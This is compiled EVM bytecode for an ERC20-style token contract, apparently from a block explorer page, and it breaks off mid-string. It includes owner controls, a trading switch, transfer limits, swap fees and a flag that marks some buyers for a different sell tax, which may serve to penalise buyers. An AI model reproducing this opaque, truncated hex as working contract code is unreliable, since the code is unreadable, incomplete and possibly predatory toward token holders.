49093168252919020805490921617905562000721565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038216620004d25760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060026000828254620004e691906200070b565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b505050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200056d57607f821691505b6020821081036200058e57634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200053d57600081815260208120601f850160051c81016020861015620005bd5750805b601f850160051c820191505b81811015620005de57828155600101620005c9565b505050505050565b81516001600160401b0381111562000602576200060262000542565b6200061a8162000613845462000558565b8462000594565b602080601f831160018114620006525760008415620006395750858301515b600019600386901b1c1916600185901b178555620005de565b600085815260208120601f198616915b82811015620006835788860151825594840194600190910190840162000662565b5085821015620006a25787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b8082028115828204841417620006e257620006e2620006b2565b92915050565b6000826200070657634e487b7160e01b600052601260045260246000fd5b500490565b80820180821115620006e257620006e2620006b2565b60805161203c6200077c6000396000818161032801528181610677015281816107b10152818161099401528181610a2501528181610b3c01528181610b6501528181611a1b01528181611ad30152611b68015261203c6000f3fe6080604052600436106101fd5760003560e01c806354b762a61161010d57806395d89b41116100a0578063aa4bde281161006f578063aa4bde28146105b0578063dd62ed3e146105c6578063ef437ff5146105e6578063f2fde38b14610606578063fca675a81461062657600080fd5b806395d89b41146105465780639be050751461055b578063a457c2d714610570578063a9059cbb1461059057600080fd5b80638b42507f116100dc5780638b42507f146104cc5780638c0b5e22146104fc5780638cc63bfb146105125780638da5cb5b1461052857600080fd5b806354b762a6146104575780636c5808011461046c57806370a0823114610481578063715018a6146104b757600080fd5b806318160ddd11610190578063395093511161015f57806339509351146103b15780633eb5d9b2146103d15780633f4218e0146103e757806349bd5a5e1461041757806349df728c1461043757600080fd5b806318160ddd1461034a57806323b872dd1461035f578063313ce5671461037f57806333ee17931461039b57600080fd5b8063095ea7b3116101cc578063095ea7b3146102ae5780631287be1f146102de57806313380e571461030e5780631694505e1461031657600080fd5b806303fd2a45146102095780630445b6671461024657806306b091f91461026a57806306fdde031461028c57600080fd5b3661020457005b600080fd5b34801561021557600080fd5b50600954610229906001600160a01b031681565b6040516001600160a01b0390911681526020015b60405180910390f35b34801561025257600080fd5b5061025c60105481565b60405190815260200161023d565b34801561027657600080fd5b5061028a610285366004611bf1565b610654565b005b34801561029857600080fd5b506102a16108de565b60405161023d9190611c1d565b3480156102ba57600080fd5b506102ce6102c9366004611bf1565b610970565b604051901515815260200161023d565b3480156102ea57600080fd5b506102ce6102f9366004611c6b565b600d6020526000908152604090205460ff1681565b61028a61098a565b34801561032257600080fd5b506102297f000000000000000000000000000000000000000000000000000000000000000081565b34801561035657600080fd5b5060025461025c565b34801561036b57600080fd5b506102ce61037a366004611c8f565b610c5a565b34801561038b57600080fd5b506040516012815260200161023d565b3480156103a757600080fd5b5061025c60125481565b3480156103bd57600080fd5b506102ce6103cc366004611bf1565b610c7e565b3480156103dd57600080fd5b5061025c60115481565b3480156103f357600080fd5b506102ce610402366004611c6b565b600b6020526000908152604090205460ff1681565b34801561042357600080fd5b50600a54610229906001600160a01b031681565b34801561044357600080fd5b5061028a610452366004611c6b565b610ca0565b34801561046357600080fd5b506102ce610d92565b34801561047857600080fd5b5061028a610dd9565b34801561048d57600080fd5b5061025c61049c366004611c6b565b6001600160a01b031660009081526020819052604090205490565b3480156104c357600080fd5b5061028a610e57565b3480156104d857600080fd5b506102ce6104e7366004611c6b565b600c6020526000908152604090205460ff1681565b34801561050857600080fd5b5061025c600e5481565b34801561051e57600080fd5b5061025c60155481565b34801561053457600080fd5b506005546001600160a01b0316610229565b34801561055257600080fd5b506102a1610e6b565b34801561056757600080fd5b5061028a610e7a565b34801561057c57600080fd5b506102ce61058b366004611bf1565b610e99565b34801561059c57600080fd5b506102ce6105ab366004611bf1565b610f14565b3480156105bc57600080fd5b5061025c600f5481565b3480156105d257600080fd5b5061025c6105e1366004611cd0565b610f22565b3480156105f257600080fd5b5061028a610601366004611d17565b610f4d565b34801561061257600080fd5b5061028a610621366004611c6b565b610f80565b34801561063257600080fd5b5060095461064790600160a01b900460ff1681565b60405161023d9190611d5b565b6040805160028082526060820183526000926020830190803683370190505090507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156106d3573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106f79190611d83565b8160008151811061070a5761070a611da0565b60200260200101906001600160a01b031690816001600160a01b031681525050308160018151811061073e5761073e611da0565b60200260200101906001600160a01b031690816001600160a01b03168152505060008160018151811061077357610773611da0565b602090810291909101810151336000908152600b90925260409091205490915060ff166108265760405163b6f9de9560e01b81526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000169063b6f9de959085906107ef9060009087908a904290600401611dfa565b6000604051808303818588803b15801561080857600080fd5b505af115801561081c573d6000803e3d6000fd5b50505050506108d8565b6108308484610ff9565b806001600160a01b03166323b872dd858460018151811061085357610853611da0565b60209081029190910101516040516001600160e01b031960e085901b1681526001600160a01b03928316600482015291166024820152604481018690526064016020604051808303816000875af11580156108b2573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108d69190611e2f565b505b50505050565b6060600380546108ed90611e4c565b80601f016020809104026020016040519081016040528092919081815260200182805461091990611e4c565b80156109665780601f1061093b57610100808354040283529160200191610966565b820191906000526020600020905b81548152906001019060200180831161094957829003601f168201915b5050505050905090565b60003361097e81858561101a565b60019150505b92915050565b61099261113e565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156109f0573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a149190611d83565b6001600160a01b031663c9c65396307f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610a81573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610aa59190611d83565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610af2573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b169190611d83565b600a80546001600160a01b0319166001600160a01b0392909216919091179055610b63307f000000000000000000000000000000000000000000000000000000000000000060001961101a565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663f305d7193430610bb3306001600160a01b031660009081526020819052604090205490565b600080610bc86005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610c30573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610c559190611e86565b505050565b600033610c68858285611198565b610c7385858561120c565b506001949350505050565b60003361097e818585610c918383610f22565b610c9b9190611eca565b61101a565b610ca861113e565b6008546040516370a0823160e01b81523060048201526001600160a01b038381169263a9059cbb9291169083906370a0823190602401602060405180830381865afa158015610cfb573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610d1f9190611edd565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af1158015610d6a573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610d8e9190611e2f565b5050565b6008546015546040516000926001600160a01b03169180156108fc029184818181858888f19350505050158015610dcd573d6000803e3d6000fd5b50506000601555600190565b610de161113e565b600954600160b01b900460ff1615610e405760405162461bcd60e51b815260206004820152601a60248201527f54726164696e6720697320616c726561647920656e61626c656400000000000060448201526064015b60405180910390fd5b6009805461ffff60b01b191661010160b01b179055565b610e5f61113e565b610e69600061179f565b565b6060600480546108ed90611e4c565b610e8261113e565b6b033b2e3c9fd0803ce8000000600e819055600f55565b60003381610ea78286610f22565b905083811015610f075760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610e37565b610c73828686840361101a565b60003361097e81858561120c565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610f5561113e565b6001600160a01b03919091166000908152600c60205260409020805460ff1916911515919091179055565b610f8861113e565b6001600160a01b038116610fed5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610e37565b610ff68161179f565b50565b3060006110068285610f22565b905060001981146108d8576108d884838584035b6001600160a01b03831661107c5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610e37565b6001600160a01b0382166110dd5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610e37565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6005546001600160a01b03163314610e695760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610e37565b60006111a48484610f22565b905060001981146108d857818110156111ff5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610e37565b6108d8848484840361101a565b6001600160a01b0383166112325760405162461bcd60e51b8152600401610e3790611ef6565b6001600160a01b0382166112585760405162461bcd60e51b8152600401610e3790611f3b565b6001600160a01b0383166000908152600b602052604090205460ff1615801561129a57506001600160a01b0382166000908152600b602052604090205460ff16155b156112ee57600954600160b01b900460ff166112ee5760405162461bcd60e51b8152602060048201526013602482015272151c98591a5b99c81b9bdd08195b98589b1959606a1b6044820152606401610e37565b6001600160a01b0383166000908152600c602052604090205460ff1615801561133057506001600160a01b0382166000908152600c602052604090205460ff16155b1561145557600a546001600160a01b0383811691161461145557600e548111156113c25760405162461bcd60e51b815260206004820152603d60248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74206265660000006064820152608401610e37565b600f546001600160a01b0383166000908152602081905260409020546113e89083611eca565b11156114555760405162461bcd60e51b815260206004820152603660248201527f45524332303a2062616c616e636520616d6f756e74206578636565646564206d604482015275185e081dd85b1b195d08185b5bdd5b9d081b1a5b5a5d60521b6064820152608401610e37565b6001600160a01b0383166000908152600b6020526040902054819060ff1615801561149957506001600160a01b0383166000908152600b602052604090205460ff16155b1561179457600a546001600160a01b03858116911614806114c75750600a546001600160a01b038481169116145b1561171d57600e548211156115445760405162461bcd60e51b815260206004820152603960248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74000000000000006064820152608401610e37565b600a546001600160a01b03858116911614801561157a57506001600160a01b0383166000908152600c602052604090205460ff16155b801561158f57506001600160a01b0384163014155b15611614576000600954600160a01b900460ff1660038111156115b4576115b4611d45565b036115dd576001600160a01b0383166000908152600d60205260409020805460ff191660011790555b60006064601154846115ef9190611f7e565b6115f99190611f95565b90506116068530836117f1565b6116108184611fb7565b9150505b600a546001600160a01b03848116911614801561164a57506001600160a01b0384166000908152600c602052604090205460ff16155b801561165f57506001600160a01b0383163014155b80156116745750600954600160b81b900460ff165b801561168a5750600954600160a81b900460ff16155b15611718576012546001600160a01b0385166000908152600d602052604090205460ff1615156001036116bc57506013545b6009805460ff60a81b1916600160a81b1790556116d761191b565b6009805460ff60a81b19169055600060646116f28386611f7e565b6116fc9190611f95565b90506117098630836117f1565b6117138185611fb7565b925050505b611794565b6001600160a01b0384166000908152600d602052604090205460ff16151560011480156117585750600a546001600160a01b03848116911614155b1561179457600060646013548461176f9190611f7e565b6117799190611f95565b90506117868530836117f1565b6117908184611fb7565b9150505b6108d88484836117f1565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b0383166118175760405162461bcd60e51b8152600401610e3790611ef6565b6001600160a01b03821661183d5760405162461bcd60e51b8152600401610e3790611f3b565b6001600160a01b038316600090815260208190526040902054818110156118b55760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610e37565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36108d8565b3060009081526020819052604090205460000361193457565b30600090815260208190526040808220546008546001600160a01b031683529082205460105447919084908411156108d6574792506119748460006119c4565b61197e8347611fb7565b94506010548211156119a65780611996576000611998565b845b6119a29086611f95565b6015555b84601560008282546119b89190611eca565b90915550505050505050565b60408051600280825260608201835260009260208301908036833701905050905030816000815181106119f9576119f9611da0565b60200260200101906001600160a01b031690816001600160a01b0316815250507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611a77573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611a9b9190611d83565b81600181518110611aae57611aae611da0565b6001600160a01b03928316602091820292909201015260405163095ea7b360e01b81527f000000000000000000000000000000000000000000000000000000000000000090911660048201526000196024820152309063095ea7b3906044016020604051808303816000875af1158015611b2c573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611b509190611e2f565b5060405163791ac94760e01b81526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000169063791ac94790611ba59086908690869030904290600401611fca565b600060405180830381600087803b158015611bbf57600080fd5b505af1158015611bd3573d6000803e3d6000fd5b50505050505050565b6001600160a01b0381168114610ff657600080fd5b60008060408385031215611c0457600080fd5b8235611c0f81611bdc565b946020939093013593505050565b600060208083528351808285015260005b81811015611c4a57858101830151858201604001528201611c2e565b506000604082860101526040601f19601f8301168501019250505092915050565b600060208284031215611c7d57600080fd5b8135611c8881611bdc565b9392505050565b600080600060608486031215611ca457600080fd5b8335611caf81611bdc565b92506020840135611cbf81611bdc565b929592945050506040919091013590565b60008060408385031215611ce357600080fd5b8235611cee81611bdc565b91506020830135611cfe81611bdc565b809150509250929050565b8015158114610ff657600080fd5b60008060408385031215611d2a57600080fd5b8235611d3581611bdc565b91506020830135611cfe81611d09565b634e487b7160e01b600052602160045260246000fd5b6020810160048310611d7d57634e487b7160e01b600052602160045260246000fd5b91905290565b600060208284031215611d9557600080fd5b8151611c8881611bdc565b634e487b7160e01b600052603260045260246000fd5b600081518084526020808501945080840160005b83811015611def5781516001600160a01b031687529582019590820190600101611dca565b509495945050505050565b848152608060208201526000611e136080830186611db6565b6001600160a01b03949094166040830152506060015292915050565b600060208284031215611e4157600080fd5b8151611c8881611d09565b600181811c90821680611e6057607f821691505b602082108103611e8057634e487b7160e01b600052602260045260246000fd5b50919050565b600080600060608486031215611e9b57600080fd5b8351925060208401519150604084015190509250925092565b634e487b7160e01b600052601160045260246000fd5b8082018082111561098457610984611eb4565b600060208284031215611eef57600080fd5b5051919050565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b808202811582820484141761098457610984611eb4565b600082611fb257634e487b7160e01b600052601260045260246000fd5b500490565b8181038181111561098457610984611eb4565b85815284602082015260a060408201526000611fe960a0830186611db6565b6001600160a01b039490941660608301525060800152939250505056fea26469706673582212204a196c7779d0e39644bb2fd8837170a3358047c67924b5af46e1b5fc031334d464736f6c63430008130033
Deployed Bytecode
0x6080604052600436106101fd5760003560e01c806354b762a61161010d57806395d89b41116100a0578063aa4bde281161006f578063aa4bde28146105b0578063dd62ed3e146105c6578063ef437ff5146105e6578063f2fde38b14610606578063fca675a81461062657600080fd5b806395d89b41146105465780639be050751461055b578063a457c2d714610570578063a9059cbb1461059057600080fd5b80638b42507f116100dc5780638b42507f146104cc5780638c0b5e22146104fc5780638cc63bfb146105125780638da5cb5b1461052857600080fd5b806354b762a6146104575780636c5808011461046c57806370a0823114610481578063715018a6146104b757600080fd5b806318160ddd11610190578063395093511161015f57806339509351146103b15780633eb5d9b2146103d15780633f4218e0146103e757806349bd5a5e1461041757806349df728c1461043757600080fd5b806318160ddd1461034a57806323b872dd1461035f578063313ce5671461037f57806333ee17931461039b57600080fd5b8063095ea7b3116101cc578063095ea7b3146102ae5780631287be1f146102de57806313380e571461030e5780631694505e1461031657600080fd5b806303fd2a45146102095780630445b6671461024657806306b091f91461026a57806306fdde031461028c57600080fd5b3661020457005b600080fd5b34801561021557600080fd5b50600954610229906001600160a01b031681565b6040516001600160a01b0390911681526020015b60405180910390f35b34801561025257600080fd5b5061025c60105481565b60405190815260200161023d565b34801561027657600080fd5b5061028a610285366004611bf1565b610654565b005b34801561029857600080fd5b506102a16108de565b60405161023d9190611c1d565b3480156102ba57600080fd5b506102ce6102c9366004611bf1565b610970565b604051901515815260200161023d565b3480156102ea57600080fd5b506102ce6102f9366004611c6b565b600d6020526000908152604090205460ff1681565b61028a61098a565b34801561032257600080fd5b506102297f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b34801561035657600080fd5b5060025461025c565b34801561036b57600080fd5b506102ce61037a366004611c8f565b610c5a565b34801561038b57600080fd5b506040516012815260200161023d565b3480156103a757600080fd5b5061025c60125481565b3480156103bd57600080fd5b506102ce6103cc366004611bf1565b610c7e565b3480156103dd57600080fd5b5061025c60115481565b3480156103f357600080fd5b506102ce610402366004611c6b565b600b6020526000908152604090205460ff1681565b34801561042357600080fd5b50600a54610229906001600160a01b031681565b34801561044357600080fd5b5061028a610452366004611c6b565b610ca0565b34801561046357600080fd5b506102ce610d92565b34801561047857600080fd5b5061028a610dd9565b34801561048d57600080fd5b5061025c61049c366004611c6b565b6001600160a01b031660009081526020819052604090205490565b3480156104c357600080fd5b5061028a610e57565b3480156104d857600080fd5b506102ce6104e7366004611c6b565b600c6020526000908152604090205460ff1681565b34801561050857600080fd5b5061025c600e5481565b34801561051e57600080fd5b5061025c60155481565b34801561053457600080fd5b506005546001600160a01b0316610229565b34801561055257600080fd5b506102a1610e6b565b34801561056757600080fd5b5061028a610e7a565b34801561057c57600080fd5b506102ce61058b366004611bf1565b610e99565b34801561059c57600080fd5b506102ce6105ab366004611bf1565b610f14565b3480156105bc57600080fd5b5061025c600f5481565b3480156105d257600080fd5b5061025c6105e1366004611cd0565b610f22565b3480156105f257600080fd5b5061028a610601366004611d17565b610f4d565b34801561061257600080fd5b5061028a610621366004611c6b565b610f80565b34801561063257600080fd5b5060095461064790600160a01b900460ff1681565b60405161023d9190611d5b565b6040805160028082526060820183526000926020830190803683370190505090507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156106d3573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106f79190611d83565b8160008151811061070a5761070a611da0565b60200260200101906001600160a01b031690816001600160a01b031681525050308160018151811061073e5761073e611da0565b60200260200101906001600160a01b031690816001600160a01b03168152505060008160018151811061077357610773611da0565b602090810291909101810151336000908152600b90925260409091205490915060ff166108265760405163b6f9de9560e01b81526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d169063b6f9de959085906107ef9060009087908a904290600401611dfa565b6000604051808303818588803b15801561080857600080fd5b505af115801561081c573d6000803e3d6000fd5b50505050506108d8565b6108308484610ff9565b806001600160a01b03166323b872dd858460018151811061085357610853611da0565b60209081029190910101516040516001600160e01b031960e085901b1681526001600160a01b03928316600482015291166024820152604481018690526064016020604051808303816000875af11580156108b2573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108d69190611e2f565b505b50505050565b6060600380546108ed90611e4c565b80601f016020809104026020016040519081016040528092919081815260200182805461091990611e4c565b80156109665780601f1061093b57610100808354040283529160200191610966565b820191906000526020600020905b81548152906001019060200180831161094957829003601f168201915b5050505050905090565b60003361097e81858561101a565b60019150505b92915050565b61099261113e565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156109f0573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a149190611d83565b6001600160a01b031663c9c65396307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610a81573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610aa59190611d83565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610af2573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b169190611d83565b600a80546001600160a01b0319166001600160a01b0392909216919091179055610b63307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d60001961101a565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663f305d7193430610bb3306001600160a01b031660009081526020819052604090205490565b600080610bc86005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610c30573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610c559190611e86565b505050565b600033610c68858285611198565b610c7385858561120c565b506001949350505050565b60003361097e818585610c918383610f22565b610c9b9190611eca565b61101a565b610ca861113e565b6008546040516370a0823160e01b81523060048201526001600160a01b038381169263a9059cbb9291169083906370a0823190602401602060405180830381865afa158015610cfb573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610d1f9190611edd565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af1158015610d6a573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610d8e9190611e2f565b5050565b6008546015546040516000926001600160a01b03169180156108fc029184818181858888f19350505050158015610dcd573d6000803e3d6000fd5b50506000601555600190565b610de161113e565b600954600160b01b900460ff1615610e405760405162461bcd60e51b815260206004820152601a60248201527f54726164696e6720697320616c726561647920656e61626c656400000000000060448201526064015b60405180910390fd5b6009805461ffff60b01b191661010160b01b179055565b610e5f61113e565b610e69600061179f565b565b6060600480546108ed90611e4c565b610e8261113e565b6b033b2e3c9fd0803ce8000000600e819055600f55565b60003381610ea78286610f22565b905083811015610f075760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610e37565b610c73828686840361101a565b60003361097e81858561120c565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610f5561113e565b6001600160a01b03919091166000908152600c60205260409020805460ff1916911515919091179055565b610f8861113e565b6001600160a01b038116610fed5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610e37565b610ff68161179f565b50565b3060006110068285610f22565b905060001981146108d8576108d884838584035b6001600160a01b03831661107c5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610e37565b6001600160a01b0382166110dd5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610e37565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6005546001600160a01b03163314610e695760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610e37565b60006111a48484610f22565b905060001981146108d857818110156111ff5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610e37565b6108d8848484840361101a565b6001600160a01b0383166112325760405162461bcd60e51b8152600401610e3790611ef6565b6001600160a01b0382166112585760405162461bcd60e51b8152600401610e3790611f3b565b6001600160a01b0383166000908152600b602052604090205460ff1615801561129a57506001600160a01b0382166000908152600b602052604090205460ff16155b156112ee57600954600160b01b900460ff166112ee5760405162461bcd60e51b8152602060048201526013602482015272151c98591a5b99c81b9bdd08195b98589b1959606a1b6044820152606401610e37565b6001600160a01b0383166000908152600c602052604090205460ff1615801561133057506001600160a01b0382166000908152600c602052604090205460ff16155b1561145557600a546001600160a01b0383811691161461145557600e548111156113c25760405162461bcd60e51b815260206004820152603d60248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74206265660000006064820152608401610e37565b600f546001600160a01b0383166000908152602081905260409020546113e89083611eca565b11156114555760405162461bcd60e51b815260206004820152603660248201527f45524332303a2062616c616e636520616d6f756e74206578636565646564206d604482015275185e081dd85b1b195d08185b5bdd5b9d081b1a5b5a5d60521b6064820152608401610e37565b6001600160a01b0383166000908152600b6020526040902054819060ff1615801561149957506001600160a01b0383166000908152600b602052604090205460ff16155b1561179457600a546001600160a01b03858116911614806114c75750600a546001600160a01b038481169116145b1561171d57600e548211156115445760405162461bcd60e51b815260206004820152603960248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74000000000000006064820152608401610e37565b600a546001600160a01b03858116911614801561157a57506001600160a01b0383166000908152600c602052604090205460ff16155b801561158f57506001600160a01b0384163014155b15611614576000600954600160a01b900460ff1660038111156115b4576115b4611d45565b036115dd576001600160a01b0383166000908152600d60205260409020805460ff191660011790555b60006064601154846115ef9190611f7e565b6115f99190611f95565b90506116068530836117f1565b6116108184611fb7565b9150505b600a546001600160a01b03848116911614801561164a57506001600160a01b0384166000908152600c602052604090205460ff16155b801561165f57506001600160a01b0383163014155b80156116745750600954600160b81b900460ff165b801561168a5750600954600160a81b900460ff16155b15611718576012546001600160a01b0385166000908152600d602052604090205460ff1615156001036116bc57506013545b6009805460ff60a81b1916600160a81b1790556116d761191b565b6009805460ff60a81b19169055600060646116f28386611f7e565b6116fc9190611f95565b90506117098630836117f1565b6117138185611fb7565b925050505b611794565b6001600160a01b0384166000908152600d602052604090205460ff16151560011480156117585750600a546001600160a01b03848116911614155b1561179457600060646013548461176f9190611f7e565b6117799190611f95565b90506117868530836117f1565b6117908184611fb7565b9150505b6108d88484836117f1565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b0383166118175760405162461bcd60e51b8152600401610e3790611ef6565b6001600160a01b03821661183d5760405162461bcd60e51b8152600401610e3790611f3b565b6001600160a01b038316600090815260208190526040902054818110156118b55760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610e37565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36108d8565b3060009081526020819052604090205460000361193457565b30600090815260208190526040808220546008546001600160a01b031683529082205460105447919084908411156108d6574792506119748460006119c4565b61197e8347611fb7565b94506010548211156119a65780611996576000611998565b845b6119a29086611f95565b6015555b84601560008282546119b89190611eca565b90915550505050505050565b60408051600280825260608201835260009260208301908036833701905050905030816000815181106119f9576119f9611da0565b60200260200101906001600160a01b031690816001600160a01b0316815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611a77573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611a9b9190611d83565b81600181518110611aae57611aae611da0565b6001600160a01b03928316602091820292909201015260405163095ea7b360e01b81527f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d90911660048201526000196024820152309063095ea7b3906044016020604051808303816000875af1158015611b2c573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611b509190611e2f565b5060405163791ac94760e01b81526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d169063791ac94790611ba59086908690869030904290600401611fca565b600060405180830381600087803b158015611bbf57600080fd5b505af1158015611bd3573d6000803e3d6000fd5b50505050505050565b6001600160a01b0381168114610ff657600080fd5b60008060408385031215611c0457600080fd5b8235611c0f81611bdc565b946020939093013593505050565b600060208083528351808285015260005b81811015611c4a57858101830151858201604001528201611c2e565b506000604082860101526040601f19601f8301168501019250505092915050565b600060208284031215611c7d57600080fd5b8135611c8881611bdc565b9392505050565b600080600060608486031215611ca457600080fd5b8335611caf81611bdc565b92506020840135611cbf81611bdc565b929592945050506040919091013590565b60008060408385031215611ce357600080fd5b8235611cee81611bdc565b91506020830135611cfe81611bdc565b809150509250929050565b8015158114610ff657600080fd5b60008060408385031215611d2a57600080fd5b8235611d3581611bdc565b91506020830135611cfe81611d09565b634e487b7160e01b600052602160045260246000fd5b6020810160048310611d7d57634e487b7160e01b600052602160045260246000fd5b91905290565b600060208284031215611d9557600080fd5b8151611c8881611bdc565b634e487b7160e01b600052603260045260246000fd5b600081518084526020808501945080840160005b83811015611def5781516001600160a01b031687529582019590820190600101611dca565b509495945050505050565b848152608060208201526000611e136080830186611db6565b6001600160